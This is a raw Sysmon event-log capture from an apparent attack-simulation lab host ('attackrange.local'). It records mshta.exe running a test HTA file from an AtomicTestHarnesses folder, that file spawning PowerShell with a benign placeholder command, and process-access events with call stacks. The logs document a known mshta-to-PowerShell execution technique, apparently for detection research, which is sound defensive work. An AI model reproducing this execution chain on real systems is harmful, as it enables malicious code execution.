15:59:22.413{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.413{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.413{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.413{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.413{7901BC46-535A-6008-4706-00000000A301}75487584C:\Windows\System32\mshta.exe{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000024161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.414{7901BC46-535A-6008-4806-00000000A301}8012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta" 10341000x800000000000000024160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.382{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.382{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.382{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.366{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.366{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.366{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.366{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.351{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.351{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.335{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.335{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000024145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000024144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.340{7901BC46-535A-6008-4706-00000000A301}7548C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "\\WIN-DC-283\C$\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000024143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4606-00000000A301}3316C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 